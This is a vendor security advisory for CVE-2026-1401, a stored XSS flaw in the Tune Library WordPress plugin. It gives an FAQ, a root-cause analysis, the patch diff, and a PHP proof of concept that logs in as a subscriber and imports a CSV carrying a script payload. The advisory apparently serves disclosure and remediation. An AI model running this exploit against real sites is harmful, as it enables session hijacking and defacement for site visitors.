What is CVE-2026-1401?

CVE-2026-1401 is a stored cross-site scripting (XSS) vulnerability in the Tune Library plugin for WordPress. It allows authenticated users with Subscriber-level access and above to inject malicious scripts via CSV import, which can then execute when other users access the affected pages.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping during the CSV import process. Attackers can upload a CSV file containing JavaScript payloads that are stored in the database and executed when the data is rendered on the site.

Who is affected by this vulnerability?

All users of the Tune Library plugin version 1.6.3 and earlier are affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Tune Library plugin installed on your WordPress site. If it is version 1.6.3 or earlier, your site is at risk and should be updated.

How can I fix this vulnerability?

The vulnerability has been patched in version 1.6.4 of the Tune Library plugin. Update to this version or later to mitigate the risk associated with CVE-2026-1401.

What are the risks associated with this vulnerability?

The CVSS score for this vulnerability is 6.4, indicating a medium severity level. Successful exploitation can lead to session hijacking, defacement, or malicious redirects for users viewing the injected content, although it does not compromise the server directly.

What is stored cross-site scripting (XSS)?

Stored XSS occurs when an attacker injects malicious scripts into a web application, and these scripts are stored in the database. When other users access the affected pages, the scripts execute in their browsers, potentially leading to data theft or other malicious actions.

What steps should I take if I have been exploited?

If you suspect exploitation, immediately update the Tune Library plugin to the latest version. Review your site for any unauthorized changes and consider changing passwords for affected user accounts. Monitor for unusual activity on your site.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can create a malicious CSV file containing a JavaScript payload. By logging in as a Subscriber and importing this CSV, the attacker can store the script in the database, which executes when the data is rendered on the site.

What are the best practices to prevent similar vulnerabilities?

To prevent similar vulnerabilities, ensure that all plugins are kept up to date, implement strict input validation and output escaping, and regularly review user permissions. Additionally, consider using security plugins that provide additional layers of protection.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Tune Library plugin until you can apply the patch. Review user roles and limit access to the CSV import functionality to trusted administrators only.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1401: Tune Library <= 1.6.3 – Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting via CSV Import (tune-library)

CVE ID CVE-2026-1401

Plugin tune-library

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.6.3

Patched Version 1.6.4

Disclosed February 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1401:
The Tune Library WordPress plugin version 1.6.3 and earlier contains an authenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in the CSV import functionality, allowing users with Subscriber-level access or higher to inject malicious scripts. These scripts execute when the imported library data is rendered via the plugin’s shortcode, leading to a medium-severity impact.

The root cause is a combination of missing capability checks and insufficient data sanitization. In the vulnerable version, the `tune-library.php` file processes CSV import requests at lines 174 and 217 without verifying the user’s permissions. The code block handling the `importcsv` POST parameter (line 217) directly inserts user-supplied data from the CSV file into the database. The imported `title`, `artist`, `albumartist`, and `album` fields lack sanitization before insertion. Later, the `writeNodes.php` file outputs these database values without proper escaping in multiple `echo` statements (lines 14, 28, 66, 68, 108, 110), creating an XSS sink.

Exploitation requires an authenticated attacker with at least Subscriber privileges. The attacker crafts a CSV file containing JavaScript payloads within fields like `title` or `artist`. They then submit this file via a POST request to the plugin’s configuration page, targeting the `importcsv` action. The exact endpoint is the WordPress admin area where the plugin’s menu is loaded, typically involving `admin.php?page=tune-library-pp`. The payload is stored in the plugin’s custom `tracks` database table. When a site visitor or administrator loads a page containing the `[tune-library]` shortcode, the malicious script executes in their browser context.

The patch in version 1.6.4 addresses both the authorization and sanitization flaws. In `tune-library.php`, the developer added a capability check (`current_user_can(‘manage_options’)`) and a nonce verification (`check_admin_referer`) before processing import requests (lines 176-183 and 227-234). This restricts CSV import functionality to users with Administrator privileges only. The patch also introduces input sanitization for the CSV data using `sanitize_text_field()` for text columns and `intval()` for numeric columns during the database insert (line 250). In `writeNodes.php`, output escaping is added using `esc_html()` for all text fields (lines 14, 28, 66, 68, 108, 110) and `intval()` for numeric fields, preventing script execution upon rendering.

Successful exploitation leads to stored XSS. An attacker can inject arbitrary JavaScript that executes in the context of any user viewing the compromised library page. This allows session hijacking, defacement, malicious redirects, or actions performed on behalf of the victim user. While the attack requires a low-privilege account, the impact is limited to the front-end context of users who view the injected content, not direct server compromise.

Differential between vulnerable and patched code

Code Diff

--- a/tune-library/tune-library.php
+++ b/tune-library/tune-library.php
@@ -3,7 +3,7 @@
 Plugin Name: Tune Library
 Plugin URI: https://ylefebvre.github.io/wordpress-plugins/tune-library/
 Description: A plugin that can be used to import an iTunes Library into a MySQl database and display the contents of the collection on a Wordpress Page.
-Version: 1.6.3
+Version: 1.6.4
 Author: Yannick Lefebvre
 Author URI: https://ylefebvre.github.io/
 */
@@ -174,6 +174,14 @@
 			global $wpdb;

 			if ( isset( $_POST['importitunes'] ) ) {
+
+				// ADD: Capability check and nonce validation
+				if ( !current_user_can( 'manage_options' ) ) {
+					die( __( 'Unauthorized' ) );
+				}
+
+				check_admin_referer( 'tunelibrarypp-config' );
+
 				echo "<div id='message' class='updated fade'>";
 				$options  = get_option('TuneLibraryPP');

@@ -217,6 +225,14 @@

 				echo '</div>';
 			} elseif ( isset( $_POST['importcsv'] ) ) {
+
+				// ADD: Capability check and nonce validation
+				if ( !current_user_can( 'manage_options' ) ) {
+					die( __( 'Unauthorized' ) );
+				}
+
+				check_admin_referer( 'tunelibrarypp-config' );
+
 				global $wpdb;
 				$row = 0;

@@ -232,7 +248,7 @@

 						if (!$skiprow) {
 							if ( count( $data ) == 5 ) {
-								$wpdb->insert( $wpdb->get_blog_prefix() . "tracks", array( 'title' => $data[0], 'artist' => $data[1], 'albumartist' => $data[2], 'album' => $data[3], 'tracknum' => $data[4] ) );
+								$wpdb->insert( $wpdb->get_blog_prefix() . "tracks", array( 'title' => sanitize_text_field( $data[0] ), 'artist' => sanitize_text_field( $data[1] ), 'albumartist' => sanitize_text_field( $data[2] ), 'album' => sanitize_text_field( $data[3] ), 'tracknum' => intval( $data[4] ) ) );
 							}
 						}
 					}
@@ -307,6 +323,7 @@
 				<form action="admin-post.php" method="post" enctype="multipart/form-data" id="analytics-conf">
 					<input type="hidden" name="action" value="tune_lib_admin" />
 					<input type="hidden" name="MAX_FILE_SIZE" value="128000000" />
+
 					<table class="form-table" style="width:100%;">
 					<?php
 					if ( function_exists('wp_nonce_field') )
--- a/tune-library/writeNodes.php
+++ b/tune-library/writeNodes.php
@@ -14,7 +14,7 @@
 		$tracks = $wpdb->get_results( $querystr );

 		foreach($tracks as $track){
-			echo "<li><a href='#'> ".$track->album."</a>
+			echo "<li><a href='#'> ". esc_html( $track->album )."</a>
 				<ul>
 					<li parentId='album::".urlencode($itemData)."::".urlencode($track->album)."'><a href='#'>Loading...</a></li>
 				</ul>
@@ -28,7 +28,7 @@
 		$tracks = $wpdb->get_results( $querystr );

 		foreach($tracks as $track){
-			echo "<li><a href='#'> ".$track->album."</a>
+			echo "<li><a href='#'> ". esc_html( $track->album )."</a>
 				<ul>
 					<li parentId='albumvarious::".urlencode($itemData)."::".urlencode($track->album)."'><a href='#'>Loading...</a></li>
 				</ul>
@@ -66,11 +66,11 @@
 			if( isset( $track['tracknum'] ) ) {
 				echo '<li class="dhtmlgoodies_sheet.gif"><a href="#" disabled></a> ';
 				if ( isset( $track['diskid'] ) && ( 1 != $track['diskid'] || count( $disk_id_array ) > 1 ) ) {
-					echo $track['diskid'] . ' - ';
+					echo intval( $track['diskid'] ) . ' - ';
 				}
-				echo $track['tracknum'] . ' - ' . $track['title'] . '</li>';
+				echo intval( $track['tracknum'] ) . ' - ' . esc_html( $track['title'] ) . '</li>';
 			} else {
-				echo "<li class='dhtmlgoodies_sheet.gif'><a href='#' disabled></a> " . $track['title'] . '</li>';
+				echo "<li class='dhtmlgoodies_sheet.gif'><a href='#' disabled></a> " . esc_html( $track['title'] ) . '</li>';
 			}
 		}
 	}
@@ -108,11 +108,11 @@
 			if ( isset( $track['tracknum'] ) ){
 				echo '<li class="dhtmlgoodies_sheet.gif"><a href="#" disabled></a> ';
 				if ( isset( $track['diskid'] ) && ( 1 != $track['diskid'] || count( $disk_id_array ) > 1 ) ) {
-					echo $track['diskid'] . ' - ';
+					echo intval( $track['diskid'] ) . ' - ';
 				}
-				echo $track['tracknum'] . ' - ' . $track['artist'] . ' - ' . $track['title'] . '</li>';
+				echo intval( $track['tracknum'] ) . ' - ' . esc_html( $track['artist'] ) . ' - ' . esc_html( $track['title'] ) . '</li>';
 			} else {
-				echo '<li class="dhtmlgoodies_sheet.gif"><a href="#" disabled></a> ' . $track['title'] . '</li>';
+				echo '<li class="dhtmlgoodies_sheet.gif"><a href="#" disabled></a> ' . esc_html( $track['title'] ) . '</li>';
 			}
 		}
 	}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1401 - Tune Library <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting via CSV Import
<?php
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=tune-library-pp';
$username = 'subscriber';
$password = 'password';

// Create a malicious CSV payload. The title field contains a JavaScript alert.
$csv_content = "Title,Artist,AlbumArtist,Album,TrackNumn";
$csv_content .= "<script>alert('Atomic Edge XSS')</script>,Malicious Artist,,,1";
$csv_file_path = sys_get_temp_dir() . '/exploit.csv';
file_put_contents($csv_file_path, $csv_content);

// Initialize cURL session for login to obtain cookies.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, str_replace('admin.php', 'wp-login.php', $target_url));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In')));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Check if login was successful by looking for dashboard indicators.
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Now perform the CSV import request using the authenticated session.
// The vulnerable endpoint expects a multipart form POST with the 'importcsv' parameter.
$post_fields = array(
    'importcsv' => 'Import CSV',
    'action' => 'tune_lib_admin',
    'MAX_FILE_SIZE' => '128000000'
);
$post_fields['csvfile'] = new CURLFile($csv_file_path, 'text/csv', 'exploit.csv');

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$import_response = curl_exec($ch);
curl_close($ch);

// Clean up temporary file.
unlink($csv_file_path);

// Verify if the import succeeded by checking for success messages.
if (strpos($import_response, 'CSV file imported successfully') !== false || strpos($import_response, 'updated fade') !== false) {
    echo "Payload injected successfully. Visit any page with the [tune-library] shortcode to trigger XSS.n";
} else {
    echo "Injection may have failed. Check response or site version.n";
}
?>

Frequently Asked Questions

What is CVE-2026-1401?
Understanding the vulnerability
CVE-2026-1401 is a stored cross-site scripting (XSS) vulnerability in the Tune Library plugin for WordPress. It allows authenticated users with Subscriber-level access and above to inject malicious scripts via CSV import, which can then execute when other users access the affected pages.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping during the CSV import process. Attackers can upload a CSV file containing JavaScript payloads that are stored in the database and executed when the data is rendered on the site.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the Tune Library plugin version 1.6.3 and earlier are affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Tune Library plugin installed on your WordPress site. If it is version 1.6.3 or earlier, your site is at risk and should be updated.
How can I fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 1.6.4 of the Tune Library plugin. Update to this version or later to mitigate the risk associated with CVE-2026-1401.
What are the risks associated with this vulnerability?
Understanding the severity
The CVSS score for this vulnerability is 6.4, indicating a medium severity level. Successful exploitation can lead to session hijacking, defacement, or malicious redirects for users viewing the injected content, although it does not compromise the server directly.
What is stored cross-site scripting (XSS)?
Explaining the attack type
Stored XSS occurs when an attacker injects malicious scripts into a web application, and these scripts are stored in the database. When other users access the affected pages, the scripts execute in their browsers, potentially leading to data theft or other malicious actions.
What steps should I take if I have been exploited?
Responding to an attack
If you suspect exploitation, immediately update the Tune Library plugin to the latest version. Review your site for any unauthorized changes and consider changing passwords for affected user accounts. Monitor for unusual activity on your site.
How does the proof of concept demonstrate the issue?
Illustrating the exploitation method
The proof of concept shows how an attacker can create a malicious CSV file containing a JavaScript payload. By logging in as a Subscriber and importing this CSV, the attacker can store the script in the database, which executes when the data is rendered on the site.
What are the best practices to prevent similar vulnerabilities?
Enhancing security measures
To prevent similar vulnerabilities, ensure that all plugins are kept up to date, implement strict input validation and output escaping, and regularly review user permissions. Additionally, consider using security plugins that provide additional layers of protection.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Tune Library plugin until you can apply the patch. Review user roles and limit access to the CSV import functionality to trusted administrators only.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations